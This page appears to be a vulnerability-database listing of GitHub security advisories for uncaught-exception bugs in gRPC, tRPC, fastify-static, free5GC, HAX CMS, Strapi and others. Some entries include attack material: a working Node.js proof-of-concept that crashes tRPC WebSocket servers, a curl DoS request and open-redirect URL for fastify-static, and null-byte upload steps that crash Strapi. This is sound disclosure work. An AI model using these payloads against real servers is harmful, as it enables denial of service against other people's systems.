CWE-248
AllowedUncaught Exception
Abstraction: Base · Status: Draft
An exception is thrown from a function, but it is not caught.
420 vulnerabilities reference this CWE, most recent first.
GHSA-P25M-JPJ4-QCRR
Vulnerability from github – Published: 2023-09-13 18:31 – Updated: 2026-01-12 19:17Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "grpc"
},
"ranges": [
{
"events": [
{
"introduced": "1.56.0"
},
{
"fixed": "1.56.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "grpc"
},
"ranges": [
{
"events": [
{
"introduced": "1.55.0"
},
{
"fixed": "1.55.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "grpc"
},
"ranges": [
{
"events": [
{
"introduced": "1.54.0"
},
{
"fixed": "1.54.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "grpc"
},
"ranges": [
{
"events": [
{
"introduced": "1.53.0"
},
{
"fixed": "1.53.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "grpcio"
},
"ranges": [
{
"events": [
{
"introduced": "1.55.0"
},
{
"fixed": "1.55.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "grpcio"
},
"ranges": [
{
"events": [
{
"introduced": "1.54.0"
},
{
"fixed": "1.54.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "grpcio"
},
"ranges": [
{
"events": [
{
"introduced": "1.53.0"
},
{
"fixed": "1.53.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-4785"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-02T20:42:27Z",
"nvd_published_at": "2023-09-13T17:15:10Z",
"severity": "HIGH"
},
"details": "Lack of error handling in the TCP server in Google\u0027s gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected.\u00a0",
"id": "GHSA-p25m-jpj4-qcrr",
"modified": "2026-01-12T19:17:00Z",
"published": "2023-09-13T18:31:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4785"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc/pull/33656"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc/pull/33667"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc/pull/33669"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc/pull/33670"
},
{
"type": "WEB",
"url": "https://github.com/grpc/grpc/pull/33672"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/grpc/CVE-2023-4785.yml"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/grpc-io/c/LlLkB1CeE4U"
},
{
"type": "WEB",
"url": "https://rubygems.org/gems/grpc/versions/1.53.2"
},
{
"type": "WEB",
"url": "https://rubygems.org/gems/grpc/versions/1.54.3"
},
{
"type": "WEB",
"url": "https://rubygems.org/gems/grpc/versions/1.55.3"
},
{
"type": "WEB",
"url": "https://rubygems.org/gems/grpc/versions/1.56.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Denial of Service Vulnerability in gRPC TCP Server (Posix-compatible platforms)"
}
GHSA-P4M2-Q7R3-J2H5
Vulnerability from github – Published: 2024-09-16 18:31 – Updated: 2024-09-16 18:31Uncaught exception in Intel(R) RAID Web Console software all versions may allow an authenticated user to potentially enable denial of service via local access.
{
"affected": [],
"aliases": [
"CVE-2024-33848"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-16T17:16:05Z",
"severity": "MODERATE"
},
"details": "Uncaught exception in Intel(R) RAID Web Console software all versions may allow an authenticated user to potentially enable denial of service via local access.",
"id": "GHSA-p4m2-q7r3-j2h5",
"modified": "2024-09-16T18:31:22Z",
"published": "2024-09-16T18:31:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33848"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00926.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P9HG-PQ3Q-V9GV
Vulnerability from github – Published: 2026-03-18 20:11 – Updated: 2026-03-20 21:24Impact
This is an Improper Input Validation vulnerability with Denial of Service and Injection implications.
- Security Impact: A remote attacker can inject null bytes (URL-encoded as %00) into the supi path parameter of the UDM's Nudm_SubscriberDataManagement API. This causes URL parsing failure in Go's net/url package with the error "invalid control character in URL", resulting in a 500 Internal Server Error. This null byte injection vulnerability can be exploited for denial of service attacks.
- Functional Impact: When the supi parameter contains null characters, the UDM attempts to construct a URL for UDR that includes these control characters. Go's URL parser rejects them, causing the request to fail with 500 instead of properly validating input and returning 400 Bad Request.
- Affected Parties: All deployments of free5GC v4.0.1 using the UDM Nudm_SDM service with endpoints that include path parameters (e.g., /nudm-sdm/v2/{supi}/am-data).
Patches
Yes, the issue has been patched.
The fix is implemented in PR free5gc/udm#79.
Users should upgrade to the next release of free5GC that includes this commit.
Workarounds
There is no direct workaround at the application level. The recommendation is to apply the provided patch or implement API gateway-level validation to reject requests containing null bytes in path parameters before they reach UDM.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/free5gc/udm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33191"
],
"database_specific": {
"cwe_ids": [
"CWE-158",
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-18T20:11:15Z",
"nvd_published_at": "2026-03-20T08:16:12Z",
"severity": "HIGH"
},
"details": "**Impact** \nThis is an Improper Input Validation vulnerability with Denial of Service and Injection implications. \n- **Security Impact**: A remote attacker can inject null bytes (URL-encoded as `%00`) into the `supi` path parameter of the UDM\u0027s Nudm_SubscriberDataManagement API. This causes URL parsing failure in Go\u0027s `net/url` package with the error \"invalid control character in URL\", resulting in a 500 Internal Server Error. This null byte injection vulnerability can be exploited for denial of service attacks. \n- **Functional Impact**: When the `supi` parameter contains null characters, the UDM attempts to construct a URL for UDR that includes these control characters. Go\u0027s URL parser rejects them, causing the request to fail with 500 instead of properly validating input and returning 400 Bad Request. \n- **Affected Parties**: All deployments of free5GC v4.0.1 using the UDM Nudm_SDM service with endpoints that include path parameters (e.g., `/nudm-sdm/v2/{supi}/am-data`).\n\n**Patches** \nYes, the issue has been patched. \nThe fix is implemented in PR free5gc/udm#79. \nUsers should upgrade to the next release of free5GC that includes this commit.\n\n**Workarounds** \nThere is no direct workaround at the application level. The recommendation is to apply the provided patch or implement API gateway-level validation to reject requests containing null bytes in path parameters before they reach UDM.",
"id": "GHSA-p9hg-pq3q-v9gv",
"modified": "2026-03-20T21:24:27Z",
"published": "2026-03-18T20:11:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-p9hg-pq3q-v9gv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33191"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/udm/pull/79"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/udm/commit/88de9fa74a1b3f3522e53b4cfa2d184712ffa4ee"
},
{
"type": "PACKAGE",
"url": "https://github.com/free5gc/udm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "free5GC UDM vulnerable to null byte injection in URL path parameters causing 500 Internal Server Error"
}
GHSA-PGH6-M65R-2RHQ
Vulnerability from github – Published: 2021-10-12 16:04 – Updated: 2021-10-21 14:57Impact
A redirect vulnerability in the fastify-static module allows remote attackers to redirect Mozilla Firefox users to arbitrary websites via a double slash // followed by a domain: http://localhost:3000//a//youtube.com/%2e%2e%2f%2e%2e.
A DOS vulnerability is possible if the URL contains invalid characters curl --path-as-is "http://localhost:3000//^/.."
The issue shows up on all the fastify-static applications that set redirect: true option. By default, it is false.
Patches
The issue has been patched in fastify-static@4.4.1
Workarounds
If updating is not an option, you can sanitize the input URLs using the rewriteUrl server option.
References
- Bug founder: drstrnegth
- hackerone Report
For more information
If you have any questions or comments about this advisory: * Open an issue in fastify-static * Contact the security team
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "fastify-static"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.4"
},
{
"fixed": "4.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-22964"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2021-10-11T18:38:24Z",
"nvd_published_at": "2021-10-14T15:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\nA redirect vulnerability in the `fastify-static` module allows remote attackers to redirect Mozilla Firefox users to arbitrary websites via a double slash `//` followed by a domain: `http://localhost:3000//a//youtube.com/%2e%2e%2f%2e%2e`.\n\nA DOS vulnerability is possible if the URL contains invalid characters `curl --path-as-is \"http://localhost:3000//^/..\"`\n\nThe issue shows up on all the `fastify-static` applications that set `redirect: true` option. By default, it is `false`.\n\n### Patches\nThe issue has been patched in `fastify-static@4.4.1`\n\n### Workarounds\nIf updating is not an option, you can sanitize the input URLs using the [`rewriteUrl`](https://www.fastify.io/docs/latest/Server/#rewriteurl) server option.\n\n### References\n\n+ Bug founder: drstrnegth\n+ [hackerone Report](https://hackerone.com/reports/1361804)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [fastify-static](https://github.com/fastify/fastify-static)\n* Contact the [security team](https://github.com/fastify/fastify/blob/main/SECURITY.md#the-fastify-security-team)\n",
"id": "GHSA-pgh6-m65r-2rhq",
"modified": "2021-10-21T14:57:14Z",
"published": "2021-10-12T16:04:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fastify/fastify-static/security/advisories/GHSA-pgh6-m65r-2rhq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22964"
},
{
"type": "WEB",
"url": "https://github.com/fastify/fastify-static/commit/c31f17d107cb19a0e96733c80a9abf16c56166d4"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1361804"
},
{
"type": "PACKAGE",
"url": "https://github.com/fastify/fastify-static"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "DOS and Open Redirect with user input"
}
GHSA-PGP9-98JM-WWQ2
Vulnerability from github – Published: 2025-10-15 17:27 – Updated: 2025-10-15 19:14Impact
An uncaught panic triggered by malformed input to alloy_dyn_abi::TypedData could lead to a denial-of-service (DoS) via eip712_signing_hash().
Software with high availability requirements such as network services may be particularly impacted. If in use, external auto-restarting mechanisms can partially mitigate the availability issues unless repeated attacks are possible.
Patches
The vulnerability was patched by adding a check to ensure the element is not empty before accessing its first element; an error is returned if it is empty. The fix is included in version v1.4.1 and backported to v0.8.26.
Workarounds
There is no known workaround that mitigates the vulnerability. Upgrading to a patched version is the recommended course of action.
Reported by
Christian Reitter & Zeke Mostov from Turnkey
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "alloy-dyn-abi"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.26"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "crates.io",
"name": "alloy-dyn-abi"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62370"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-15T17:27:12Z",
"nvd_published_at": "2025-10-15T16:15:36Z",
"severity": "HIGH"
},
"details": "### Impact\n\nAn uncaught panic triggered by malformed input to `alloy_dyn_abi::TypedData` could lead to a denial-of-service (DoS) via `eip712_signing_hash()`.\n\nSoftware with high availability requirements such as network services may be particularly impacted. If in use, external auto-restarting mechanisms can partially mitigate the availability issues unless repeated attacks are possible.\n\n### Patches\n\nThe vulnerability was patched by adding a check to ensure the element is not empty before accessing its first element; an error is returned if it is empty. The fix is included in version [`v1.4.1`](https://crates.io/crates/alloy-dyn-abi/1.4.1) and backported to [`v0.8.26`](https://crates.io/crates/alloy-dyn-abi/0.8.26).\n\n### Workarounds\n\nThere is no known workaround that mitigates the vulnerability. Upgrading to a patched version is the recommended course of action.\n\n### Reported by\n\nChristian Reitter \u0026 Zeke Mostov from [Turnkey](https://www.turnkey.com/)",
"id": "GHSA-pgp9-98jm-wwq2",
"modified": "2025-10-15T19:14:37Z",
"published": "2025-10-15T17:27:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/alloy-rs/core/security/advisories/GHSA-pgp9-98jm-wwq2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62370"
},
{
"type": "WEB",
"url": "https://github.com/alloy-rs/core/commit/7823e9af8c20e9fcfb5360f5eafd891c457ebccf"
},
{
"type": "WEB",
"url": "https://crates.io/crates/alloy-dyn-abi/0.8.26"
},
{
"type": "WEB",
"url": "https://crates.io/crates/alloy-dyn-abi/1.4.1"
},
{
"type": "PACKAGE",
"url": "https://github.com/alloy-rs/core"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2025-0073.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "alloy-dyn-abi has DoS vulnerability on `alloy_dyn_abi::TypedData` hashing"
}
GHSA-PJ3V-9CM8-GVJ8
Vulnerability from github – Published: 2025-04-24 16:03 – Updated: 2025-04-24 16:03Summary
An unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server.
Details
Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. Here is an example:
https://github.com/user-attachments/assets/ce1b2d32-6103-4e54-8446-51535b293b05
I have a working reproduction here if you would like to test: https://github.com/lukechilds/trpc-vuln-reproduction
The connectionParams logic introduced in https://github.com/trpc/trpc/pull/5839 does not safely handle invalid connectionParams objects. During validation if the object does not match an expected shape an error will be thrown:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/unstable-core-do-not-import/http/parseConnectionParams.ts#L27-L33
This is called during WebSocket connection setup inside createCtxPromise() here:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L435
createCtxPromise has handling to catch any errors and pass them up to the opts.onError handler:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L144-L173
However the error handler then rethrows the error:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L171
Since this is all triggered from the WebSocket message event there is no higher level error handling so this causes an uncaught exception and crashes the server process.
This means any tRPC 11 server with WebSockets enabled can be crashed by an attacker sending an invalid connectionParams object. It doesn't matter if the server doesn't make user of connectionParams, the connectionParams logic can be initiated by the client.
To fix this vulnerability tRPC should not rethrow the error after it's be handled. This patch fixes the vulnerability:
From 5747b1d11946f60268eb86c59784bd6f7eb50abd Mon Sep 17 00:00:00 2001
From: Luke Childs <lukechilds123@gmail.com>
Date: Sun, 20 Apr 2025 13:27:10 +0700
Subject: [PATCH] Don't throw already handled error
This error has already been handled so no need to re-throw. If we re-throw it will not be caught and will trigger an uncaught exception causing the entire server process to crash.
---
packages/server/src/adapters/ws.ts | 2 --
1 file changed, 2 deletions(-)
diff --git a/packages/server/src/adapters/ws.ts b/packages/server/src/adapters/ws.ts
index ad869affd..5a578b5cb 100644
--- a/packages/server/src/adapters/ws.ts
+++ b/packages/server/src/adapters/ws.ts
@@ -167,8 +167,6 @@ export function getWSConnectionHandler<TRouter extends AnyRouter>(
(globalThis.setImmediate ?? globalThis.setTimeout)(() => {
client.close();
});
-
- throw error;
});
}
--
2.48.1
PoC
This script will crash the target tRPC 11 server if WebSockets are enabled:
#!/usr/bin/env node
const TARGET = 'ws://localhost:3000'
// These malicious connection params will crash any tRPC v11.1.0 WebSocket server on validation
const MALICIOUS_CONNECTION_PARAMS = JSON.stringify({
method: "connectionParams",
data: { invalidConnectionParams: null },
});
// Open a connection to the target
const target = `${TARGET}?connectionParams=1`;
console.log(`Opening a WebSocket to ${target}`);
const socket = new WebSocket(target);
// Wait for the connection to be established
socket.addEventListener("open", () => {
console.log("WebSocket established!");
// Sends a message to the WebSocket server.
console.log(`Sending malicious connectionParams`);
socket.send(MALICIOUS_CONNECTION_PARAMS);
console.log(`Done!`);
});
// Handle errors
socket.addEventListener("error", () => console.log("Error opening WebSocket"));
Complete PoC with vulnerable WebSocket server here: https://github.com/lukechilds/trpc-vuln-reproduction
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@trpc/server"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-43855"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-460"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-24T16:03:57Z",
"nvd_published_at": "2025-04-24T14:15:59Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAn unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server.\n\n### Details\nAny tRPC 11 server with WebSocket enabled with a `createContext` method set is vulnerable. Here is an example:\n\nhttps://github.com/user-attachments/assets/ce1b2d32-6103-4e54-8446-51535b293b05\n\nI have a working reproduction here if you would like to test: https://github.com/lukechilds/trpc-vuln-reproduction\n\nThe connectionParams logic introduced in https://github.com/trpc/trpc/pull/5839 does not safely handle invalid connectionParams objects. During validation if the object does not match an expected shape an error will be thrown:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/unstable-core-do-not-import/http/parseConnectionParams.ts#L27-L33\n\nThis is called during WebSocket connection setup inside `createCtxPromise()` here:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L435\n\n`createCtxPromise` has handling to catch any errors and pass them up to the `opts.onError` handler:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L144-L173\n\nHowever the error handler then rethrows the error:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L171\n\nSince this is all triggered from the WebSocket `message` event there is no higher level error handling so this causes an uncaught exception and crashes the server process.\n\nThis means any tRPC 11 server with WebSockets enabled can be crashed by an attacker sending an invalid connectionParams object. It doesn\u0027t matter if the server doesn\u0027t make user of connectionParams, the connectionParams logic can be initiated by the client.\n\nTo fix this vulnerability tRPC should not rethrow the error after it\u0027s be handled. This patch fixes the vulnerability:\n\n```patch\nFrom 5747b1d11946f60268eb86c59784bd6f7eb50abd Mon Sep 17 00:00:00 2001\nFrom: Luke Childs \u003clukechilds123@gmail.com\u003e\nDate: Sun, 20 Apr 2025 13:27:10 +0700\nSubject: [PATCH] Don\u0027t throw already handled error\n\nThis error has already been handled so no need to re-throw. If we re-throw it will not be caught and will trigger an uncaught exception causing the entire server process to crash.\n---\n packages/server/src/adapters/ws.ts | 2 --\n 1 file changed, 2 deletions(-)\n\ndiff --git a/packages/server/src/adapters/ws.ts b/packages/server/src/adapters/ws.ts\nindex ad869affd..5a578b5cb 100644\n--- a/packages/server/src/adapters/ws.ts\n+++ b/packages/server/src/adapters/ws.ts\n@@ -167,8 +167,6 @@ export function getWSConnectionHandler\u003cTRouter extends AnyRouter\u003e(\n (globalThis.setImmediate ?? globalThis.setTimeout)(() =\u003e {\n client.close();\n });\n-\n- throw error;\n });\n }\n\n--\n2.48.1\n\n```\n\n## PoC\n\nThis script will crash the target tRPC 11 server if WebSockets are enabled:\n\n```js\n#!/usr/bin/env node\n\nconst TARGET = \u0027ws://localhost:3000\u0027\n\n// These malicious connection params will crash any tRPC v11.1.0 WebSocket server on validation\nconst MALICIOUS_CONNECTION_PARAMS = JSON.stringify({\n method: \"connectionParams\",\n data: { invalidConnectionParams: null },\n});\n\n// Open a connection to the target\nconst target = `${TARGET}?connectionParams=1`;\nconsole.log(`Opening a WebSocket to ${target}`);\nconst socket = new WebSocket(target);\n\n// Wait for the connection to be established\nsocket.addEventListener(\"open\", () =\u003e {\n console.log(\"WebSocket established!\");\n\n // Sends a message to the WebSocket server.\n console.log(`Sending malicious connectionParams`);\n socket.send(MALICIOUS_CONNECTION_PARAMS);\n console.log(`Done!`);\n});\n\n// Handle errors\nsocket.addEventListener(\"error\", () =\u003e console.log(\"Error opening WebSocket\"));\n```\n\nComplete PoC with vulnerable WebSocket server here: https://github.com/lukechilds/trpc-vuln-reproduction",
"id": "GHSA-pj3v-9cm8-gvj8",
"modified": "2025-04-24T16:03:58Z",
"published": "2025-04-24T16:03:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/security/advisories/GHSA-pj3v-9cm8-gvj8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43855"
},
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/pull/5839"
},
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/commit/9beb26c636d44852e0f407f3d7a82ad54df65b4d"
},
{
"type": "PACKAGE",
"url": "https://github.com/trpc/trpc"
},
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L171"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "tRPC 11 WebSocket DoS Vulnerability"
}
GHSA-PJ6J-M62J-7V7V
Vulnerability from github – Published: 2023-03-07 21:30 – Updated: 2023-03-13 06:30In thermal, there is a possible memory corruption due to an uncaught exception. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494460; Issue ID: ALPS07494460.
{
"affected": [],
"aliases": [
"CVE-2023-20628"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-07T21:15:00Z",
"severity": "MODERATE"
},
"details": "In thermal, there is a possible memory corruption due to an uncaught exception. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07494460; Issue ID: ALPS07494460.",
"id": "GHSA-pj6j-m62j-7v7v",
"modified": "2023-03-13T06:30:25Z",
"published": "2023-03-07T21:30:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20628"
},
{
"type": "WEB",
"url": "https://corp.mediatek.com/product-security-bulletin/March-2023"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PJJ3-J5J6-QJ27
Vulnerability from github – Published: 2025-07-21 19:52 – Updated: 2025-07-21 22:21Summary
The HAX CMS NodeJS application crashes when an authenticated attacker provides an API request lacking required URL parameters. This vulnerability affects the listFiles and saveFiles endpoints.
Details
This vulnerability exists because the application does not properly handle exceptions which occur as a result of changes to user-modifiable URL parameters.
Affected Resources
• listFiles.js:22 listFiles() • saveFile.js:52 saveFile() • system/api/listFiles • system/api/saveFile
PoC
-
Targeting an instance of instance of HAX CMS NodeJS, send a request without parameters to
listFilesorsaveFiles. The following screenshot shows the request in Burp Suite. -
The server will crash with
ERR_INVALID_ARG_TYPE.
Impact
An authenticated attacker can deny access to the HAX CMS NodeJS application by crashing the backend server. This prevents all users from accessing the backend system. If the backend system is hosting websites, those websites will be unavailable.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@haxtheweb/haxcms-nodejs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.0.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-54134"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-248",
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-21T19:52:53Z",
"nvd_published_at": "2025-07-21T21:15:26Z",
"severity": "HIGH"
},
"details": "### Summary\nThe HAX CMS NodeJS application crashes when an authenticated attacker provides an API request lacking required URL parameters. This vulnerability affects the `listFiles` and `saveFiles` endpoints.\n\n### Details\nThis vulnerability exists because the application does not properly handle exceptions which occur as a result of changes to user-modifiable URL parameters.\n\n#### Affected Resources\n\u2022 [listFiles.js:22](https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/listFiles.js#L22) listFiles()\n\u2022 [saveFile.js:52](https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/saveFile.js#L52) saveFile()\n\u2022 system/api/listFiles\n\u2022 system/api/saveFile\n\n### PoC\n1. Targeting an instance of instance of [HAX CMS NodeJS](https://github.com/haxtheweb/haxcms-nodejs), send a request without parameters to `listFiles` or `saveFiles`. The following screenshot shows the request in Burp Suite.\n\n\n2. The server will crash with `ERR_INVALID_ARG_TYPE`.\n\n\n### Impact\nAn authenticated attacker can deny access to the HAX CMS NodeJS application by crashing the backend server. This prevents all users from accessing the backend system. If the backend system is hosting websites, those websites will be unavailable.",
"id": "GHSA-pjj3-j5j6-qj27",
"modified": "2025-07-21T22:21:29Z",
"published": "2025-07-21T19:52:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-pjj3-j5j6-qj27"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54134"
},
{
"type": "WEB",
"url": "https://github.com/haxtheweb/haxcms-nodejs/commit/e9773d1996233f9bafb06832b8220ec2a98bab34"
},
{
"type": "PACKAGE",
"url": "https://github.com/haxtheweb/haxcms-nodejs"
},
{
"type": "WEB",
"url": "https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/listFiles.js#L22"
},
{
"type": "WEB",
"url": "https://github.com/haxtheweb/haxcms-nodejs/blob/main/src/routes/saveFile.js#L52"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "HAX CMS NodeJS Application Has Improper Error Handling That Leads to Denial of Service"
}
GHSA-PM9Q-XJ9P-96PM
Vulnerability from github – Published: 2024-06-12 19:38 – Updated: 2024-06-12 19:38Summary
A Denial-of-Service was found in the media upload process causing the server to crash without restarting, affecting either development and production environments.
Details
Usually, errors in the application cause it to log the error and keep it running for other clients. This behavior, in contrast, stops the server execution, making it unavailable for any clients until it's manually restarted.
PoC
Due to a bug in what we believe to be Burp’s decoding system, we couldn’t produce a valid file to easily reproduce the vulnerability. Instead, the issue can be reproduced by following these steps:
1. Configure Burp’s proxy between a browser and a Strapi server
2. Log in and upload an image through the Media Library page while having Burp’s interceptor turned on
3. After capturing the upload POST request in Burp, add %00 at the end of the file extension from the Content-Disposition, in the filename parameter (See reference image 1 below)
4. Using the cursor, select the added %00 and right-click it. Click in Convert selection > URL > URL decode to transform the selected text into a null byte
5. Forward the modified request. The server should print an error and crash with the error ERR_INVALID_ARG_VALUE (See reference log 1 below)
By following the data flow, we reached the line of code where we believe the DoS is being caused. The simpler way of fixing this vulnerability seems to be avoiding the error thrown by whitelisting the characters used in the extension.
Reference Image 1
Reference Log 1
[2024-03-22 10:23:42.629] http: POST /upload (22 ms) 400
node:internal/fs/utils:379
const err = new ERR_INVALID_ARG_VALUE(
^
TypeError [ERR_INVALID_ARG_VALUE]: The argument 'path' must be a string, Uint8Array, or URL without null bytes. Received '/mnt/storage/Development/GHSA-pm9q-xj9p-96pm/public/uploads/replaceme_png_88efe6a165.png\x00'
at new WriteStream (node:internal/fs/streams:340:5)
at Object.createWriteStream (node:fs:3123:10)
